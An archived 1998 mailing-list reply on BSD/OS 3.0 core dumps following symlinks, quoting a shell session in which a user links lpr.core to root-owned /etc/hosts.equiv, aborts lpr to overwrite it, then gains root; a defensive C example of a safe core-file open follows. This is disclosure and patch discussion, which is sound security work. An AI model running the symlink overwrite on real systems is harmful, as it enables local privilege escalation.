Re: BSD coredumps follow symlinks

From: Ariel Biener (arielat_private)
Date: Mon Apr 06 1998 - 16:43:46 PDT


    On Mon, 6 Apr 1998, Ronny Cook wrote:
    
    > > lpr will dump core if there is no symlink there. Maybe you failed to
    > > install the patch correctly?
    >
    > If I recall rightly, the first patch disabled the most obvious attacks, but
    > allowed a core dump for a setuid program across a symbolic link *if* the file
    > existed and had 600 permissions (and was owned by the appropriate user).
    
    You recall correctly. If one was to look at the bugtraq archives, one
    would find my reply to Nir's letter, on Jun 20th '97:
    
    `002810 97/06/20 20:53 66 Re: Core file anomalies under BSDi 3.0'
    
    
    From:         Ariel Biener <arielat_private>
    Subject:      Re: Core file anomalies under BSDi 3.0
    X-To:         Nir Soffer <scorpiosat_private>
    
    On Thu, 19 Jun 1997, Nir Soffer wrote:
    
    [.snip.]
    > A.) BSDi doesn't give a damn that the euid!=ruid, so finding a setgid
    > program with privileges isn't necessary.
    >
    > B.) BSDi _does_ however, check if the file exists, so it's quite
    > impossible to overwrite files.
    
    
    Hmm, this is not my experience:
    
    slingshot: {2} % id
    uid=100(ariel) gid=20(staff) groups=20(staff), 0(wheel)
    slingshot: {3} % ls -l /etc/hosts.equiv
    -rw-------  1 root  wheel  0 Jun 20 22:43 /etc/hosts.equiv
    slingshot: {4} % ln -s /etc/hosts.equiv lpr.core
    slingshot: {5} % lpr
    ^Z
    Suspended
    slingshot: {6} % kill -ABRT %1
    slingshot: {7} % fg
    lpr
    Abort (core dumped)
    slingshot: {8} % ls -l /etc/hosts.equiv
    -rw-------  1 root  wheel  167936 Jun 20 22:45 /etc/hosts.equiv
    slingshot: {9} % su
    Password:
    Jun 20 22:46:34 slingshot su: ariel to root on /dev/ttyp0
    slingshot: {1} % uname -a
    BSD/OS slingshot.tau.ac.il 3.0 BSDI BSD/OS 3.0 Kernel #0: Mon Jun 16
    19:51:22 IDT 1997
    rootat_private:/usr/src/sys/compile/SLINGSHOT  i386
    
    It won't work if the target file is *not* mode 0600.
    
    --Ariel
    >
    > Unfortunately, certain sensitive files (such as /etc/master.passwd) fit
    > these conditions. Thus the later patch under 3.0, which disabled *any*
    > core dump across a symbolic link for *any* setuid program.
    
    Exactly. The 1st patch didn't fix it.
    
    --Ariel
    >
    > Nir's test was only for a nonexistent file, which the earlier patch handles
    > correctly. Unfortunately, in doing so it opens the other security hole
    > which was later patched under 3.0.
    >
    >               ...Ronny
    > --
    > Ronald Cook, Technical Manager - Message Handling Systems/The Message eXchange
    > Email: ronnyat_private ----- Phone: +61-2-9550-4448 ---- Fax: +61-2-9519-2551
    >
    > All opinions are my own and not those of TMX unless explicitly stated otherwise.
    >
    
       +---------------------------------------------------------------+
       | Ariel Biener                                                  |
       | e-mail: arielat_private        Work ph: 03-6406086       |
       | fingerprint = 07 D1 E5 3E EF 6D E5 82 0B E9 21 D4 3C 7D 8B BC |
       +---------------------------------------------------------------+
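
    The session above succeeds because the kernel opened the core path through the symlink and wrote as root into a file the user could not touch. As an added example (not BSD/OS code and not from any of the posters), here is the set of checks a core-dump writer needs before it writes a byte, in C: refuse entirely when the real and effective uid differ, never follow a symlink at the core path, and verify on the opened descriptor that the file is a plain file owned by the real uid with a single link. The names `safe_core_open` and `demo_*` are hypothetical, the scratch directory under /tmp is constructed by the demos themselves, and because the demos run unprivileged the "target" file is owned by the tester, so the symlink and hard-link refusals are what get exercised, not the owner check.

    ```c
    #define _GNU_SOURCE
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <unistd.h>

    /* Hypothetical core-dump open policy (added example, not a real kernel's code).
     * Returns an open, NOT yet truncated fd on success, -1 on refusal. */
    int safe_core_open(const char *path, uid_t ruid, uid_t euid)
    {
        struct stat st;

        /* Credentials changed during the process's life: no core at all.
         * This is the stance of the second 3.0 patch discussed in the thread. */
        if (ruid != euid)
            return -1;

        /* O_NOFOLLOW makes open() fail (ELOOP) if the last component is a
         * symlink, with no lstat/open race. No O_TRUNC: nothing is clobbered
         * until the descriptor has been checked. */
        int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW | O_NOCTTY, 0600);
        if (fd < 0)
            return -1;

        /* Check the object we actually hold: a regular file, owned by the real
         * uid, with exactly one link (a hard link to a root-owned file fails
         * the owner test; a hard link to one of our own files fails nlink). */
        if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) ||
            st.st_uid != ruid || st.st_nlink != 1) {
            close(fd);
            return -1;
        }
        if (ftruncate(fd, 0) < 0) {   /* safe to truncate only now */
            close(fd);
            return -1;
        }
        return fd;
    }

    /* --- constructed scenarios for the example; each returns 1 when the
     *     policy behaves as intended, 0 otherwise, -1 on setup failure --- */

    static int scratch(char *dir, size_t len, char *target, char *core, size_t plen)
    {
        snprintf(dir, len, "/tmp/coretestXXXXXX");
        if (!mkdtemp(dir)) return -1;
        snprintf(target, plen, "%s/hosts.equiv", dir);   /* stands in for /etc/hosts.equiv */
        snprintf(core, plen, "%s/lpr.core", dir);
        int t = open(target, O_WRONLY | O_CREAT, 0600);
        if (t < 0) return -1;
        close(t);
        return 0;
    }

    static int finish(int fd, const char *dir, const char *target, const char *core)
    {
        int refused = (fd < 0);
        if (fd >= 0) close(fd);
        unlink(core); unlink(target); rmdir(dir);
        return refused;
    }

    int demo_symlink_is_refused(void)
    {
        char dir[64], target[128], core[128];
        if (scratch(dir, sizeof dir, target, core, sizeof target) < 0) return -1;
        if (symlink(target, core) < 0) return -1;        /* lpr.core -> hosts.equiv */
        return finish(safe_core_open(core, getuid(), geteuid()), dir, target, core);
    }

    int demo_hardlink_is_refused(void)
    {
        char dir[64], target[128], core[128];
        if (scratch(dir, sizeof dir, target, core, sizeof target) < 0) return -1;
        if (link(target, core) < 0) return -1;           /* nlink becomes 2 */
        return finish(safe_core_open(core, getuid(), geteuid()), dir, target, core);
    }

    int demo_cred_change_is_refused(void)
    {
        /* ruid 100 vs euid 0, as in the posted session: refused before any open. */
        return safe_core_open("/tmp/coretest-never-created", 100, 0) < 0;
    }

    int demo_fresh_file_is_accepted(void)
    {
        char dir[64], target[128], core[128];
        if (scratch(dir, sizeof dir, target, core, sizeof target) < 0) return -1;
        int fd = safe_core_open(core, getuid(), geteuid());   /* lpr.core does not exist yet */
        int ok = fd >= 0 && write(fd, "core", 4) == 4;
        finish(fd, dir, target, core);
        return ok;
    }

    int main(void)
    {
        printf("symlink refused:   %d\n", demo_symlink_is_refused());
        printf("hardlink refused:  %d\n", demo_hardlink_is_refused());
        printf("cred change:       %d\n", demo_cred_change_is_refused());
        printf("fresh file ok:     %d\n", demo_fresh_file_is_accepted());
        return 0;
    }
    ```

    The order matters: the first patch described by Ronny checked for existence and mode but still wrote through the link, which is why the 0600 root-owned file grew to 167936 bytes. Checking on the descriptor after an O_NOFOLLOW open, and truncating only after that check, removes both the symlink path and the race between a path check and the write.
    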
    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:48:10 PDT